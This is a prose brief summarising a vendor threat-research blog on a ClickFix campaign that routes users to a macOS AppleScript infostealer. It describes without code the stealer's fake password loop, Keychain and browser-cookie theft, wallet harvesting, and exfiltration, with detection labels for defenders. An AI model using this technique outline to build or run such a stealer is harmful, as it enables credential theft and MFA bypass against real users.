Netskope Threat Labs details macOS ClickFix AppleScript stealer

Netskope Threat Labs describes a ClickFix campaign that routes desktop victims to either Windows or macOS payloads, including an AppleScript-based macOS infostealer. For enterprise defenders, the report centers on cookie theft, password harvesting, and bypassing multi-factor authentication through active session hijacking.

Research Overview

The blog continues Threat Labs’ coverage of ClickFix activity, referencing earlier work that analyzed a modular NodeJS-based Windows remote access trojan and its administration components. In this update, Threat Labs focuses on a parallel macOS chain that culminates in an AppleScript infostealer.

The campaign uses client-side JavaScript to classify victims by user-agent, steering desktop users toward operating system-specific execution paths while excluding mobile devices.

Key Findings

Threat Labs reports that the macOS payload uses a persistent AppleScript dialog designed to capture system password input. The dialog is described as non-closable and as continuously reappearing after incorrect password entry, using macOS Directory Services authentication checks.

According to the blog, the infostealer targets live browser session cookies and other sensitive browser artifacts across 12 Chromium-based browsers, multiple extensions, and several standalone cryptocurrency wallet applications. Threat Labs links cookie theft to multi-factor authentication bypass by session hijacking.

Cross-Platform ClickFix Delivery

The blog describes ClickFix as a social engineering technique that asks users to copy and paste a malicious command into a terminal or Run dialog under the guise of a “browser update” or CAPTCHA verification. Threat Labs reports that this campaign includes integrated logic that selects a payload based on the user-agent and ignores user-agent strings associated with mobile devices.

For desktop users, a fake CAPTCHA page triggers a second inspection to decide whether to load an AppleScript-based loader for macOS or fall back to the Windows infostealer described in the earlier post.

Technical Breakdown of the macOS Chain

The blog states that after the user pastes and executes the command, the terminal runs a script that downloads another malicious component from an attacker-controlled server and executes it in the background using nohup. Threat Labs says the script collects the victim username, creates a staging directory at /tmp/xdivcmp/, and hardcodes a command-and-control address plus a build identifier.

Threat Labs describes the password capture stage as using an AppleScript dialog that loads the authentic macOS lock icon from local resources. The loop persists until a valid password is entered, and real-time validation is performed using macOS directory services authentication.

Data Targets and Exfiltration

Threat Labs reports that the macOS stealer extracts the macOS Keychain database by relying on the captured plaintext login password to wrap the Keychain master key. It also collects browser data, including cookies, saved credentials, autofill-related data, extension local storage and IndexedDB data, and Firefox-related database files such as cookies.sqlite and logins.json.

The blog states that extension targeting includes 200+ extension IDs spanning cryptocurrency wallet extensions, password managers, two-factor authentication-related extensions, and corporate access extensions. It also describes harvesting 16 standalone cryptocurrency wallet applications by copying wallet directories, then compressing collected data into a ZIP archive with ditto and exfiltrating it via HTTP POST before deleting the staging directory and archive.

Operational Impact and Detection Notes

Threat Labs frames the operational risk around session cookie theft enabling attackers to access accounts without completing multi-factor authentication, along with the password harvesting mechanism used during the AppleScript dialog flow. The blog also notes that macOS updates in the described releases include a native Terminal security warning intended to alert users when they are about to paste potentially harmful commands from an untrusted source.

For detection, the blog lists Netskope Threat Protection detections including Trojan.Generic.39744155 and Script.Trojan.Heuristic, and it lists an Advanced Threat Protection detection label of Gen.Detect.By.NSCloudSandbox.tr. Threat Labs also points readers to an IOC repository in GitHub for artifacts related to the macOS infostealer.

This blog reports on a ClickFix campaign that uses user-agent filtering to deliver OS-specific payloads, including an AppleScript-based macOS infostealer focused on password capture, Keychain theft, and browser session cookie collection to bypass multi-factor authentication via session hijacking. Blog Signals brief is a fact-based summary of the vendor blog.